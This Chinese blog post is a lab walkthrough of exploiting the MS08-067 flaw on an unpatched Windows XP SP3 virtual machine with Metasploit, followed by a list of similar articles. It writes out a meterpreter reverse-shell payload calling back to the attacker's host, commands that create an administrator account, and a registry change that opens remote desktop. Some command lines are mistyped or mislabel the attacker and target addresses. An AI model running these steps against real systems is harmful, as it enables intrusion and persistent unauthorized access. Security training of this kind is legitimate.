WIN xp sp3 系统上Ms08_067_netapi漏洞利用

最新推荐文章于 2025-06-26 20:42:54 发布
原创 最新推荐文章于 2025-06-26 20:42:54 发布 · 8.6k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #漏洞利用 #MS08067

本文介绍如何利用MS08-067漏洞获得目标系统的高权限,并通过建立新用户及提权实现远程连接。适用于无补丁的WINxpsp3系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限;

1:准备工作:WINxp sp3 系统(无补丁)
下载地址:
http://blog.youkuaiyun.com/sql_injection/article/details/47683419
攻击kali ip:192.168.243.133
靶机 ip :192.168.243.136
2:准备工作完成后开启kali打开终端metasploit中的msfconsole框架
命令 :
msfconsole
打开metasploit之前需要连接上postgresql:
service postgresql statr
3:寻找和加载Ms08_067模块
(1):使用搜索命令搜索此模块:
search ms08_067_netapi
(2):应用搜索到的模块地址:
use exploit/windows/smb/ms08_067_netapi
4:我们来加载一枚payload:
set payload windows/meterpreter/reverse_tcp

此时加载完毕可以查看需要设置的参数:
show options

然后如下图所示:
5:上图所示的 RHOST 为靶机的 ip, LHOST为kali 的ip:
set RHOST 被攻击者ip
set LHOST 被攻击者ip
然后进行攻击:
exploit


6:出现meterpreter命令后说明攻击成功,此时输入shell进入靶机cmd界面对其建立新的用户,并且提权:

(1):建立用户:
user net 用户名 密码 /add

(2):提权:
net localgroup administrators wmc /add




7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
(1):查看是否打开:
netstat -na



(2):显然并没有,那么我们就给它打开: 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
可以看到,3389端口已经打开。

8:接下来就用自己本机系统进行远程连接搞事情就可以了:
(1)打开cmd输入远程连接命令:
(2)此时计算机名输入靶机的ip地址就可以了,之后输入你自己建立的用户名和密码:

(3):就成功进入了:

此时完成所有操作。
总结:
此时靶机上也有了你创建的新用户。
要使用没有补丁的靶机,不然攻击时会失败。


神林丶
关注
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
李同學的安全圈
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
Windows xp Ms08067漏洞复现
hintll的博客
11-18 4189
准备工作: 虚拟机 kali Windows xp sp3中文版 先ping双方的ip,以确保双方的网络可以互通 nmap扫描Windows 命令: cd /usr/share/nmap/scripts nmap --script=vuln 192.168.XXX.XXX 扫描后有漏洞ms08067 用mts进行攻击 先找漏洞利用: search 08_067 运用漏洞: use exploit/windowsexploit/windows/smb/ms08_067_netapi 看参数: show op
MS08-067源码分析
04-04
MS08-067漏洞源码,用于分析研究,适用于window2003XPWin7
MS08_067_netapi漏洞复现
weixin_45418565的博客
05-02 964
MS08_067_netapi漏洞复现 winxp的ip地址为192.168.0.101 kali的ip地址为192.168.0.105 确保两台主机能ping通 接着我们使用kali中自带的msf进行攻击 开启postgresql数据库 service postgresql start 启动msf msfconsole 我们利用msf的数据库搜索相应winxp漏洞 search...
漏洞复现:MS08_067
最新发布
2501_90131820的博客
06-26 926
摘要:本文详细记录了MS08_067漏洞(CVE-2008-4250)的复现过程,该漏洞影响Windows 2000/XP/Server 2003系统,可通过SMB服务的445端口进行远程代码执行。复现使用Kali Linux的Metasploit框架,针对Windows Server 2003中文版需手动添加攻击模块参数。通过nmap扫描确认445端口开放后,设置攻击参数并利用漏洞成功获取系统shell权限,验证了该漏洞的危害性。文中还提及攻击过程中靶机崩溃的应对方法,以及通过添加用户实现远程连接的完整
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
qq_43093288的博客
03-25 2271
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
Windows XP SP2(MS08-067漏洞复现及利用)
sGanYu
09-03 6080
打开kali,开启msf所依赖的数据库 启动msfconsole 搜寻关于ms08-067有关的漏洞 使用 输入show options显示ms08-067模块所需的参数 配置参数,设置目标操作系统类型为4
基于Windows XP SP3系统MS08067漏洞攻击
Lorezon的博客
11-21 1946
0x00 写在前面 MS08_067是一个很经典的漏洞,是我了解网安时候接触到的第一个漏洞。只不过那时候什么都不懂。其实很久之前就想写一篇08067漏洞,但是靶机一直有问题,就一直在拖延。现在终于有机会了。不多说,直接搞。 0x01扫描漏洞 0x02启用msf,查找08067 0x03利用模块 0x04 show payloads查找攻击载荷 可以看到有很多的载荷,我们选用返回shell...
利用metasploit通过ms_08_067_netapi漏洞渗透winXp
cool_jia的博客
12-19 2728
攻击主机为装了metasploit的win10 目标主机为虚拟机中的winxp专业版sp3(需要关闭防火墙) 虚拟机中系统采用的桥接方式 1.启动metasploit 2.使用ms_08_067_netapi渗透模块,并查看信息 3.查看可用的攻击载荷 4.选择攻击载荷generic/shell_bind_tcp(此处就是要获取对方的控制台),查看有哪些参数要设置 5
网络安全利用MS-08-067漏洞渗透WindowsXP过程
qq_61415450的博客
03-25 1292
网络安全
Windows漏洞MS08-067
Nanyeer的博客
03-21 1826
MS08-067漏洞(远程命令执行漏洞)的演示
ms08_067补丁,windowsxp补丁
04-26
ms08067补丁,最近的好多病毒、木马,打过这个补丁后就可以杀了。比如:jwgkvsq.vmx
windows xp(sp3)的漏洞补丁
06-18
windows xp(sp3)的漏洞补丁
WinXP安全漏洞知多少
CNssy Blog
01-01 2930
作者:李红    转自:ezIT编者按:Windows XP过去曾被认为“最安全”,可如今发现的XP漏洞是越来越多,利用漏洞实施攻击的病毒也层出不穷,例如去年闹得沸沸扬的冲击波,今年则流行震荡波。现在微软每个月都会在网上发布安全公告,免费提供一些补丁,建议你及时给操作系统打打补丁、更新系统,以便堵上各种安全漏洞。下面就让我们来看看WinXP究竟有哪些严重的安全漏洞……文章导引:一、任务
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5912
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程中遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
Metasploit攻击winXP实例
m0_51186260的博客
05-22 567
ipconfig 查看网络配置信息 2.关闭目标主机防火墙 3.攻击主机查看当前用户和ip地址 service postgresql start 启动PostgreSQL服务 service metasploit start 在另一个终端启动Metasploit服务 armitage 启动Armitage 5.进入Armitage初始界面 扫描目标网段完整信息 7.扫描网段 8.扫描出主机 查看目标主机上开启的服务,选中目标主机10.1.1.130,右键选择Servi.
利用ms08-067漏洞远程控制Windowsxp
热门推荐
xyx107的博客
03-03 1万+
1、查找ms08-067:2、使用:3、选择payload:(开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别)4、查看options(yes为必填部分):5、输入RHOST(目标靶机)IP和LHOST的IP:6、查看适合的系统类型(简体中文sp3,编号34):7、可选target 0(自动)或自己选择:8、exploit(图中IP...
使用kali实践一个简单的winxp漏洞MS08_067
幸福诗歌的博客
01-25 3033
8-067漏洞演示与CVE-2017-11882漏洞复现 MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_0...
Metasploit攻击xpwindows/smb/ms08_067_netapi
Shiliang1995
10-23 2024
第一步 安装XP虚拟机 这里用的系统版本如下 然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击 所以先对XP设置一下 编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters 在Parameters上右键...
如何使用Metasploit在Kali Linux环境中利用MS08_067漏洞进行渗透测试?
11-09
利用MS08_067漏洞进行渗透测试,首先需要确保你的Kali Linux环境已经搭建好,并安装了Metasploit框架。以下是详细步骤: 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试](https://wenku.youkuaiyun.com/doc/7bkch3qp7u?spm=1055.2569.3001.10343) 1. 打开Kali Linux系统,启动Metasploit框架。 2. 在Metasploit中搜索MS08_067漏洞的exploit模块,可以通过输入命令'search ms08_067'来查找。 3. 加载找到的exploit模块,使用命令'exploit/windows/smb/ms08_067_netapi'。 4. 设置攻击载荷(payload),可以使用'payload windows/meterpreter/reverse_tcp',同时配置LHOST和LPORT,以确保攻击者机器能够接收反向连接。 5. 指定目标主机的RHOST选项,即攻击的目标IP地址。 6. 运行exploit模块,如果目标存在MS08_067漏洞,Metasploit将会尝试建立连接并执行载荷。 7. 成功后,攻击者将获得目标系统的Meterpreter会话,进而可以执行进一步的内网渗透和横向移动。 8. 了解并掌握这些步骤后,建议深入学习如何在合法的靶场环境中进行实践,以便更好地理解和应用这些概念。 通过以上步骤,你将能够掌握在Kali Linux中使用Metasploit利用MS08_067漏洞进行渗透测试的基本技能。为了更深入理解网络攻防技术,建议阅读《2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试》。该资料详细介绍了MS08_067漏洞的验证与利用,并结合了其他关键实验,如SQL注入、文件上传和文件包含漏洞利用与防护,为你提供全面的渗透测试学习路径。 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试](https://wenku.youkuaiyun.com/doc/7bkch3qp7u?spm=1055.2569.3001.10343)
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值